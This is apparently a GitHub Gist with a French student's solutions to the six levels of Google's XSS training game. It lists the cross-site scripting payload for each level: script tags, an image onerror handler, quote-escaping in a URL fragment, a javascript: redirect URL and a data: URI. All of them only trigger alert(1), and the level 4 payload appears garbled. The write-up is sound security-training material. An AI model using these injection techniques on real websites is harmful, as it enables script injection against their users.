Last active
October 27, 2021 14:34
-
-
Save Hullaballo2001/84383b9985952df4ce376331c6a121ac to your computer and use it in GitHub Desktop.
Quête Sécurité XSS 3.3 [Advanced] Attaques XSS : découvrir
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
level 1 : dans le formulaire <script>alert(1)</script> | |
level 2 : dans le formulaire on lui fait croire que c'est une image alors que non <img src="http://inexist.ent" onerror="javascript:alert(1)"/> | |
level 3 : dans l'url on echappe avec ' et on affiche une erreur https://xss-game.appspot.com/level3/frame#3' onerror='alert(1)'; | |
level 4 : dans le formulaire 3'**alert());// car il execute directement le javascript et lance la fonction alert | |
level 5 : dans l'url https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1) + entrer son mail + next car dans next il executera la fonction alert | |
level 6 : dans l'url https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment